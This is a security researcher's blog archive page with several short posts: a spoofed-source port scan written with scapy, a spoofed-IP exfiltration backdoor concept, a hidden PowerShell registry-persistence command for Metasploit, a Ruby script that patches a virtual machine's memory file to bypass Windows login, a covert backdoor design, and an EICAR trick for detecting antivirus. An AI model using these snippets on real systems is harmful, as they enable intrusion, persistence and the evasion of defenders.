Archive for the ‘midnight thoughts’ Category

Re-evaluating how some actions are performed can sometimes lead to new insights, which is exactly the reason for this blog post. Be aware that I’ve only tested this on two ‘test’ networks, so I cannot guarantee this will always work. Worst scenario you’ll read an (hopefully) out-of-the-box blog entry about an alternative port scan method that maybe only works in weird corner cases. The source for the script can be found on my gist, if you prefer to skip my ramblings and jump directly to the source.

One of the things I usually do is sniff traffic on the network that I am connected to with either my laptop or a drop device. At that point the output of the ifconfig command usually looks similar to this:

 eth0 Link encap:Ethernet HWaddr 00:0c:29:4b:e7:35 
 inet6 addr: fe80::20c:29ff:fe4b:e735/64 Scope:Link
 RX packets:386316 errors:0 dropped:0 overruns:0 frame:0
 TX packets:25286 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:390745367 (390.7 MB) TX bytes:4178071 (4.1 MB)

Like you will notice the interface has no IPv4 IP address assigned, you can ignore the IPv6 address for now. Normally I determine which IP address or MAC address to clone based on the traffic that I captured and analysed previously. Then I’m all set to start port scanning or performing other type of attacks.

This time however I wondered what type of activities I could perform without an IP address. I mean it would be pretty interesting to talk IP to devices, somehow see a response and not be traceable, right? So I decided to see if it would for example be possible to perform a port scan on the network without having an IP address configured on my network interface.

Since usually when you want to perform non-standard, weird or nifty tricks with TCP/IP you have to resort to raw sockets I decided to directly jump to scapy to build a POC. My working theory was as follow:

Normally when I am just sniffing traffic I see all kind of traffic that gets send to the broadcast address, so what if we perform a port scan and we specify the broadcast address as the source?

I decided to test this using two virtual machine (ubuntu & Windows 10) with the network settings on ‘NAT’ and also tested with the same virtual machines while bridged to a physical network. The following oneliners can be used to transmit the raw packet:

pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='',src='') / TCP(dport=445,flags='S')

Running tcpdump will confirm if this works or not, moment of truth:

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
23:27:21.903583 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) > Flags [S], cksum 0x803e (correct), seq 0, win 8192, length 0
23:27:21.904440 IP (tos 0x0, ttl 128, id 31823, offset 0, flags [DF], proto TCP (6), length 44) > Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0
23:27:24.910050 IP (tos 0x0, ttl 128, id 31824, offset 0, flags [DF], proto TCP (6), length 44) > Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0
23:27:30.911092 IP (tos 0x0, ttl 128, id 31825, offset 0, flags [DF], proto TCP (6), length 44) > Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0
23:27:42.911498 IP (tos 0x0, ttl 128, id 31829, offset 0, flags [DF], proto TCP (6), length 40) > Flags [R], cksum 0x1af8 (correct), seq 3699222725, win 0, length 0

wOOOOOOOt!! It seems to work. We can clearly see the packet being sent to the ‘.178’ IP address from the broadcast (.255) source address and then we see the response flowing back to the broadcast address.

Now that’s pretty interesting right? Essentially we can now perform port scans without being really traceable on the network. Somehow this still feels ‘weirdish’ because it just works on first try…so still thinking I missed something :/

sudo ./ 00:0c:29:f6:a5:65 -p 445 3389 5000 -i eth0
2017-10-26 23:13:33,559 - INFO - Started ipless port scan
2017-10-26 23:13:33,559 - INFO - Started sniffer and waiting 10s
2017-10-26 23:13:43,568 - INFO - Starting port scan
2017-10-26 23:13:43,604 - INFO - Found open port - 445
2017-10-26 23:13:43,628 - INFO - Found open port - 3389
2017-10-26 23:13:43,645 - INFO - Found closed port - 5000
2017-10-26 23:13:43,654 - INFO - Finished port scan, waiting 5s for packets
2017-10-26 23:13:52,626 - INFO - Stopped sniffer

By now everyone has probably heard of Quantum Insert NSA style, if you haven’t then I’d recommend to check out some articles at the end of this post. For those who have been around for a while the technique is not new of course and there have been multiple tools in the past that implemented this type of attack. The tools enabled you to for example fully hijack a telnet connection to insert your own commands, terminate existing connections or just generally mess around with the connection. Most of the tools relied on the fact that they could intercept traffic on the local network and then forge the TCP/IP sequence numbers (long gone are the days that you could just predict them).

So it seems this type of attack, in which knowing the sequences numbers aids in forging a spoofed packet, has been used in two very specific manners:

  • Old Skool on local networks to inject into TCP streams
  • NSA style by globally monitoring connections and injecting packets

There is a third option however that hasn’t been explored yet as far as i know, which is using this technique to bypass IP filters for bi-directional communication. You might wonder when this might come in handy right? After all most of the attackers are used to either directly exfiltrate through HTTPS or in a worst case scenario fall back to good old DNS. These methods however don’t cover some of the more isolated hosts that you sometimes encounter during an assignment.

During a couple of assignments I encountered multiple hosts which were shielded by a network firewall only allowing certain IP addresses to or from the box. The following diagram depicts the situation:

As you can see in the above diagram, for some reason the owner of the box had decided that communication with internet was needed, but only to certain IP addresses. This got me thinking on how I could exfiltrate information. The easiest way was of course to exfiltrate the information in the same way that I had obtained access to the box, which was through SSH and password reuse. I didn’t identify any other methods of exfiltration during the assignment. This was of course not the most ideal way out, since it required passing the information through multiple infected hops in the network which could attract some attention from the people in charge of defending the network.

A more elegant way in my opinion would have been to directly exfiltrate from the machine itself and avoid having a continuous connection to the machine from within the network. In this post we are going to explore the solution I found for this challenge, which is to repurpose the well known quantum insert technique to attempt and build a bi-directional communication channel with spoofed IP addresses to be able to exfiltrate from these type of isolated hosts. If you are thinking ‘this only works if IP filtering or anti address spoofing is not enforced’ then you are right. So besides the on going DDOS attacks, this is yet another reason to block outgoing spoofed packets.

If you are already familiar with IP spoofing, forging packets and quantum insert you can also skip the rest of this post and jump directly to QIBA – A quantum insert backdoor POC. Please be aware that I only tested this in a lab setup, no guarantees on real world usage :)

Lastly as you are probably used to by now, the code illustrates the concept and proofs it works, but it’s nowhere near ready for production usage.


So this is a quick post with hopefully the goal of saving somebody else some time. Just for the record, I could have missed something totally trivial and I will hopefully get corrected :)

When working with the registry_persistence module, it turns out that one of the registry entries turns into garbage. At first I blamed myself of course, but it turned out that this could probably be a bug in the meterpreter code of which I’m not sure if it really is a bug or if there is a new API call which I haven’t found yet. So when executing the module the registry looks like this:


Like you can see that’s not exactly how it really should look like, since what we are expecting is something more human readable and an actual powershell command.

The quick work around is to generate the correct string with the correct encoding and for me it was easier to do this with python:

a = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep 1; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:myregkey_name').GetValue('myregkey_value'))))\""
b = '\\x'.join("{:02x}".format(ord(c)) for c in a.encode('UTF-16LE'))
print '\\x' + b

You can then just hard code the output string into the module (replace the original ‘cmd=’ string with your hex encoded one like cmd=”\x25\x00″ etc) and it should appear correctly in your registry. Following screenshot shows before and after:


If you are curious how you could debug similar bugs yourself, keep on reading for a short tour of the problem solving part. If you are wondering why I don’t submit a PR to metasploit, that’s cause unicode scares the **** out of me. My usual experience is I generate more problems when dealing with unicode than I intended to fix.


One of the things that has always fascinated me is when you are watching some Hollywood movie and they talk about stuff like “rotating string cipher encryption with a strength of 228 bits”. Now this has always sounded both funny and interesting to me. Like what if you could convert data that is normally static into actual continuous rotating data? This morning it hit me, this is something we can actually accomplish with password hashes. We can rotate them continuously, without the user even noticing and hopefully make it harder for attackers to crack the hash. Which is the main goal of this “idea/solution” making it harder or hopefully impossible for attacker to crack the hash when they obtain it. Here is a PoC preview output, screenshot OTP and usage OTP don’t match because they were obtained at different times:


./ S3cretP4ssword 545130
 Current password hash:
 Login OK
./ S3cretP4ssword 545130
 Current password hash:
 Login Failed

Like you can see we attempt to login with the same credentials both times and yet the second time this fails. If you are impatient then you’ve probably guessed that this is due to the added 2FA data in the login credentials and as usual you can jump straight to the code on my github. Now if you are curious how this works and how you could set this up in a real life setup keep on reading, do note that I haven’t tested this yet on a real life environment however. The setup is actually one of the important parts for this to work and actually slow down or hopefully prevent an attacker from successfully cracking the obtained hashes.

Now after you’ve read that you are probably thinking “shut up already with those ‘uncrackable’ claims” and yeah you are correct. It can probably be cracked, but hopefully we can settle for the second best which is (tremendously) slowing down the attacker.

For the remainder of this entry we will be focusing on further protecting the stored hashes and not on how to protect the in transit plain text password. This since obviously if you have full control of a server where the SSL is terminated you could just intercept all passwords in plain text. This can be solved with fancy challenge-response protocols or maybe (in browser) public-key cryptography. For now, let’s dig further into this ‘continuous changing hashes’ concept.


Or for that matter any other kind of direct connection. So basically yeah it’s a backdoor over which you have no realtime control. Realtime is overrated anyways and people are way to attached to direct control of their backdoors. Let’s think about the following scenario for a minute:

You want to steal information, have as much  (and long term) control as possible and avoid anomaly detection on the wire. Preferably avoid locally installed firewalls, possibly without administrator/root privileges.

How would you go about that? I assume most responses to that question will be along the lines of:

  • behave like normal traffic
  • don’t have a direct connection, spawn one when needed
  • use connectionless protocols
  • sniffing the wire

All good and well, but they would still require the backdoor to initiate a connection to the attacker or vice versa. So let’s just choose the most obvious answer to the question: avoid any kind of direct connection to and from the backdoor. So ehhh how would you communicate with your backdoor then? Let’s again choose the obvious and easy answer: have others do the dirty work for you. Just concern yourself(the backdoor) with the really important stuff which is data. So let’s define how our connectionless backdoor should work:

Monitor any file or stream which contains data that the attacker would be able to indirectly manipulate and for which the rights of the backdoor are high enough to read or manipulate.

So practically what does this mean? That as an attacker you must know your target and be able to control his environment somewhat. Here are a few examples for sending data to the backdoor:

  • Create an account on the same forum as your target and  have a dynamic signature which sets and receives cookies.
  • Email him asking a normal question and embed the command in your signature or email text
  • Upload a game to a website the target usually plays games on and have it create

Here are a few example for sending data from the backdoor to the attacker:

  • Edit the cookies to send information back, the browser will handle the connection and firewall for you
  • Embed the data in all pictures on the computer eventually they will get uploaded somewhere
  • Adjust attachments of email in the draft folder
  • Adjust his bookmarks

Well you get the drift, it depends a lot on the privileges the backdoor has and the files it can access. Creativity will be your best buddy when implementing/using this backdoor. Just make sure your continuous file monitoring or wire sniffing doesn’t slow down the whole computer, cause that will surely alert the target.

Of course you can loosen up a bit and only use the connectionless technique to send commands which include a postback url and have the backdoor post it’s results to the given url. This of course brings the firewall problem back into the equation. It would also make the backdoor a lot less stealthy just like the traditional sniffing the wire based backdoors (ex: SniffDoorSilent Backdoortrixd00r).

Like you have probably concluded by now, it isn’t the most efficient backdoor, but it sure would be very stealthy. It makes an excellent candidate to have long term access to a compromised target. Yes the initial planting of this backdoor is it’s weakest point. The detection of the backdoor based on traffic however would be pretty difficult, since it generates none.

This has been on my mind for a while but haven’t found the time to test it out yet, so here is the midnight idea if anyone wants to test it out.

Sometimes you need to become local administrator on a windows machine which has full disk encryption, is fully up to date and has very little software which could present you with a decent attack surface. Normally you would just whip out your readily available firewire attack tools, hook up your equipment and have a shell with elevated privileges in no-time. Let’s suppose the target machine doesn’t have a firewire port or it has the drivers disabled, how could we still pwn it?

This is when theory gets mixed with practical stuff (aka the part I haven’t practically tested yet). The essence of the firewire attack is to obtain direct memory access (DMA) with the goal to freely adjust memory. What if we could access the memory without the need for a firewire port, think virtualization. All (afaik) virtualization software uses a regular file on disk which represents the memory of the virtual machine. You prolly feel it coming by now, the attack boils down to:


Boot the target machine from a cd/dvd/usb virtualize the harddisk, pause the machine, patch the memory file, resume the machine, obtain elevated privileges.

Now that doesn’t sound to hard does it? Just one important obstacle: you do need the crypto credentials to be able to perform this attack. Think social engineering, hardware keylogger or just asking nicely.

I have performed a simulation of this attack to see if at least the part of pausing the virtual machine, patching the memory file and resuming it does work. The result is as expected it DOES work. Here is the ruby POC snippet that i wrote to test it out:

#used the offsets from winlockpwn
#POC virtualized firewire,"Windows XP Professional.vmem", "rb+") do |io|
 while(b = #read the exact amount of bytes needed for the signature
 data = b.unpack("H18")
 if data.to_s == "8BFF558BEC83EC50A1".downcase #lol i like pretty uppercase hex in code
 spos = io.pos-9 #skip the cookie bytes
 if"H6").to_s == "8B4D20".downcase #this seems pretty constant check it to be sure
 puts "found: #{io.pos}" #advance to what we actually want to patch
 puts "Patching offset: " + io.pos.to_s
 puts "Original bytes: " +"H4").to_s
 puts "Patching with B001"
 count = io.write("\xb0\x01") #patch it
 io.fsync #really, really make sure we write to disk
 puts "Written bytes #{count}"
 puts "Result: " +"H4").to_s #verify it
 exit #case closed
 #this kinda results in an endless loop
 fpos = io.pos-8
 Signal.trap("USR1") do
 puts "position: #{fpos}b, #{fpos/1048576}mb"
 puts "data: %s" % data

The main obstacle at the moment is actually testing this out by virtualizing a real hard disk, since afaik it can result in a lot of problems which might prevent it from virtualizing correctly.

You might be wondering why we don’t just decrypt the harddisk, adjust some executable and encrypt the harddisk with the final result of elevated privileges. Well not all full disk encryption software allows you to decrypt the disk with the credentials you have. Some solution (specially if they are corporate) require additional keys and/or action to be taken before you are able to fully decrypt the harddisk. I assume that if you invest enough reversing time you might be able to still decrypt the harddisk with the credentials you have.

If anyone actually tests this out I would love to hear if it works, in case I get around to testing this myself I’ll let you guys know.


This is just a little midday-thought I had and well…it kinda works but not as expected yet. I’d still like to share it due to it’s simplicity. The following is all that’s needed:

<img src=”eicar.png” onload=”alert(‘AV NO’);” onerror=”alert(‘AV YES’);”>

The above should theoretically trigger “AV NO” when there is no AV installed and “AV YES” when an antivirus is installed. If you wonder why this should work it’s because of the so called “eicar string“(that you of course embed in the fake png image). When an AV encounters this special string it should trigger an alert, the string is mainly used to test if an AV functions as expected without risking an actual infection. So my theory was based upon most AV products actively blocking the file which should result in the fake image not being loaded. However after testing this with IE, Chrome & FireFox it seems that it only works as expected with IE. This test isn’t very reliable since I’ve only tested with one AV product, so feel free to test this method with others and maybe it will work with the other browsers.

I’ve done a quick search around for other detection vectors using the eicar string and only found one PDF which is pretty interesting since it describes enumerating if mail servers have an AV installed and depending on the configuration the mail servers can even disclose the AV version number.

Conclusion is that the eicar file seems to be a good candidate to detect an AV if you manage to deliver it and probe if it has been blocked. I’ve done some quick testing with cookies, but unfortunately they get manipulated by the browser thus invalidating the eicar string. If anyone has got some time on their hands maybe it’s possible to deliver eicar using HTML5 storage or flash or silverlight and detect if it’s been blocked. If you plan on further researching this to detect an AV remotely please be aware of the following requirements to deliver the eicar string:

The first 68 characters is the known string. It may be optionally appended by any combination of whitespace characters with the total file length not exceeding 128 characters. The only whitespace characters allowed are the space character, tab, LF, CR, CTRL-Z.

So unfortunately my whole theory didn’t exactly work 100% as expected but hey that’s why theories are always put to the test right?

p.s. Don’t forget you can also apply this the other way around, upload a file with the eicar string to a server and you can probably determine if there is an AV product installed (assuming you are able to remotely check if the file was blocked/deleted). In the logs it will show as EICAR TEST most probably…thus maybe even fooling the adminstrator to not pay attention to it.